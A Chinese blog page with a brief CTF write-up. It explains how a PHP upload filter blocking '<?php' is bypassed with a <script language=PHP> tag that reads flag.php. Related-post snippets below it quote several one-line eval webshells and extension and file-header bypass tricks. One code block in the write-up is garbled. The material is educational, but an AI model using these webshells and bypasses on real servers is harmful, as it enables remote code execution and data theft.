i春秋CTF Upload

最新推荐文章于 2024-05-19 22:05:05 发布

原创最新推荐文章于 2024-05-19 22:05:05 发布 · 1.2k 阅读

1 ·

CC 4.0 BY-SA版权

本文探讨了一种通过PHP脚本标记绕过文件上传过滤的方法。面对<?php被过滤的情况，采用<script language=PHP>进行尝试。此技巧允许上传特殊构造的PHP文件以读取敏感信息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

分析

可以上传任意文件，并且上传之后可以打开文件（源码有链接/u/xx.php），想到上传一段php代码来打开flag.php页面：
```
php<?php
echo 'here_is_flag';
'flag{47f996fc-4d6c-43e5-af3e-38022f1ba7a3}';xxxxxxxxxx <?phpecho 'here_is_flag';'flag{47f996fc-4d6c-43e5-af3e-38022f1ba7a3}';<?phpeval(@_POST["v"]);?>
```
但是发现<?php被过滤了，于是用php脚本标记来绕过过滤：

<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP"))); 
fclose($fh);
</script>

查看源码：

echo 'here_is_flag';
'flag{###}';

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

php upload ctf,强网杯CTF防御赛ez_upload Writeup

weixin_35645813的博客

03-17

1343

这是强网杯拟态防御线下赛遇到的web题目，本来是不打算分享Writeup的，但是由于问的人很多，于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目，算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目)，这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php，登陆页面，...

CTF之路：Flask_FileUpload文件上传漏洞利用、关于os.system()与更强大的os.popen()

zw05011的博客

01-08

4113

1.题目 BP上分析数据包，发现有提示： Give me the file, and I will return the Running results by python to you! 意思是：上传一个文件，系统将用python运行它，并返回结果经验告诉我们，上传的文件里应该含有python可执行代码。知识点 os.system()函数实现在程序中执行命令行命令解题分析上传文件发现似乎只能上传图片这也没关系，可以把文件重命名为.png/jpg 打开一个file，写入代码 import os

参与评论您还未登录，请先登录后发表或查看评论

i春秋-ctf 文件上传

AAAAAAAAAAAA66的博客

11-08

9440

文章目录前言一、题目二、解题步骤 1.我的错误思路 2.正确解题姿势总结前言 CTF小白，这道题思考了很久，i春秋上现在也没write up，卡了1天了，后面在buuctf找到了题解答。通过这一天让我对文件上传有了更深的理解。目录文章目录一、题目进入环境。二、解题步骤 1.我的错误思路 2.正确解题姿势总结一道普通的文件上传题，通过一天的思考我得到这类题目的思路总结。提示：以下是本篇文章正文内容，下

CTF-web(攻防世界upload1)

分享与记录

07-10

1258

上传的必须是图片抓包绕过返回路径访问/upload/1594351827.1.php，system(phpinfo());执行成功继续上传蚁剑连接 flag显而易见

CTF中的BUUCTF之[ACTF2020 新生赛]Upload

weixin_44632787的博客

06-17

578

CTF中的BUUCTF之[ACTF2020 新生赛]Upload 启动我们的挑战项目好吧，不管怎么看都是文件上传类型的题目。那么我们就用我经常用的一句话木马吧： GIF89a? <script language="php">eval($_POST['zyh']);</script> 然后将上面的内容改成1.png。然后上传我们的1.png（别忘记了要打开BurpSuite来进行抓包）。将BurpSuite抓到的包发送到Repeater模块然后把文件名1.png改成1.

i春秋CTF训练 Web Upload

椰奶冻不安全的博客

06-21

1434

Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容：想怎么传就怎么传，就是这么任性。 tips:flag在flag.php中链接需到ichunqiu网站申请访问网页得到文件上传输入框明显是文件上传漏洞方法一：上传木马上传小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了，可以用大小写绕过php的过

i春秋 web“百度杯”CTF比赛九月场-Upload & code

ChanCherry的博客

10-13

1071

“百度杯”CTF比赛九月场Upload 可以上传文件，并且上传之后可以点击源码链接打开文件，上传了这几句话： <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了，于是用php脚本标记来绕过过滤： <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...

i春秋CTF训练 Web who are you?

椰奶冻不安全的博客

06-30

741

Web who are you? 题目内容：http://106.75.72.168:2222/ 我是谁，我在哪，我要做什么？在文件头发现了Cookie role=Zjo1OiJ0aHJmZyI7 将Zjo1OiJ0aHJmZyI7base64解码得到f:5:"thrfg";使用凯撒密码爆破thrfg发现其位移13位是guest 故可以用admin的rot-13：nqzva，构造f:5:"nqzva"然后base64加密Zjo1OiJucXp2YSI= 用burpsuit抓包改cookie得到

Web-Upload[i春秋][50pt]

Laurel_60的博客

08-05

1387

> 去年写的，后面有点问题，懒得改了，要看就直接去翻我重写的另一篇吧2333 > https://laure1.github.io/2019/08/29/Summary-of-Web/#Upload

暑期web10：基础的文件上传upload（i春秋）、上传绕过（实验吧）

qq_41618162的博客

08-18

2879

介于之前做了个包括文件上传步骤的题，突然想拿两个之前做过的文件上传题来回顾一下一些基础做法首先是实验吧的上传绕过首先我们上传最基础的一句话木马：&lt;?php @eval($_POST['pass']);?&gt; 反馈是‘不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上传，又回显‘必须上传后缀名为php的文件才行’ 做成php...

CTFshow Web入门文件上传

m0_62905261的博客

10-05

980

CTFshow Web入门文件上传

文件上传漏洞详解（CTF篇）

热门推荐

nobugnomoney的博客

09-16

1万+

需要了解的前置知识： 1.什么是文件上传：文件上传就是通过流的方式将文件写到服务器上文件上传必须以POST提交表单表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数，**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马

CTF之upload

qq_74263993的博客

05-19

674

那我们就使用hex()和conv()两个函数，将字符转换成16进制再转换成十进制，123' +(selecselectt conv(hex(database()),16, 10))+ '.jpg，但是发现变成科学计数法了，经过多次尝试发现当输出的数字超过12位后便会以科学计数法的方式输出。那么便抓包修改一下，我们上传一个图片格式文件，将名字里加个select，发现上传后的文件没了select这个字符串，那么应该就是存在文件名位置的sql注入了，而select应该是被过滤成空了。

攻防世界CTF题：upload1

Aixwei的博客

04-11

1287

发现这里有个onchange事件，大概写了个前端的文件check，那我们在前端把它删掉再上传文件试试。发现了 disabled属性，我们把它删掉之后上传按键可以点击了，此时点击上传，可以看到上传成功。细看当前页面，发现上传按钮灰掉了，但是上传的文件还保留在前端并没有删除，此时再查看前端代码，最后，通过上传图片类型的木马，再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片，可能是前端验证文件格式，所以先看一下源代码，我们先正常上传一句话木马，被拦截后点击确定，

buuctf-[ACTF2020 新生赛]Upload（小宇特详解）

小宇的web博客

01-15

4474

buuctf-[ACTF2020 新生赛]Upload（小宇特详解）这里把鼠标放到小灯泡上，发现小灯泡亮了且有文件上传的地方。这里先上传一个php文件来查看能否上传这里只能上传指定类型的。查看源代码。这里进行了前端验证。这里尝试一下抓包，修改后缀进行上传。这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt

XCTF-攻防世界CTF平台-Web类——11、upload1（文件上传、前端校验）

Onlyone_1314的博客

11-23

5165

目录标题（1）把οnchange="check();去掉（2）禁用浏览器的JS脚本运行（3）Burp Suite抓包修改文件后缀名POST方法一句话木马GET方法一句话木马蚁剑连接打开题目地址：是一个文件上传的题目选择一个一句话脚本上传：前端存在JS代码校验文件类型，如果上传的文件后缀不是jpg和png，就会让上传按钮变得不使能：要绕过前端的JS代码校验，常见的方法有：（1）把οnchange="check();去掉可以直接把οnchange="check();去掉，这样提交文件的时候就

WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [RoarCTF 2024]Simple Upload

qq_58071132的博客

04-07

425

🍅 硬核资料：关注即可领取PPT模板、简历模板、行业经典书籍PDF。🍅 技术互助：技术群大佬指点迷津，你的问题可能不是问题，求资源在群里喊一声。🍅 面试题库：由技术群里的小伙伴们共同投稿，热乎的大厂面试真题，持续更新中。🍅 知识体系：含编程语言、算法、大数据生态圈组件（Mysql、Hive、Spark、Flink）、数据仓库、Python、前端等等。一个人可以走的很快，但一群人才能走的更远。

[ACTF2020 新生赛]Upload--BUUCTF

XiaoYeZhu_1314的博客

04-24

909

得到：Upload Success!第二步：使用bp抓上传jpg文件的包，在修改文件后缀名为phtml。第一步：上传php文件，他提示，只能上传jpg、png、gif。第四步：拼接访问，连接蚁剑，找到flag。第三步：进行放过，在访问浏览器。

js文件上传_CTF从入门到提升（九）文件上传以及相关例题分享

weixin_39786850的博客

12-03

297

点击上方蓝色字体，关注我们文件上传主要是配合一些漏洞的利用，普遍意义上的文件上传是指将信息从个人计算机传送至中央计算机，也就是我们所说的远程计算机，对站点来说，就是传到运行网站的服务器上。一般网站都有自己的逻辑，比如在网站的注册页面，你想要上传个头像，网站只需要你上传头像，而不是传其他类型的文件。CTF上传文件的目的是为了get shell，我们最终目的是拿到题目的flag，如果说存在一...

i春秋ctf web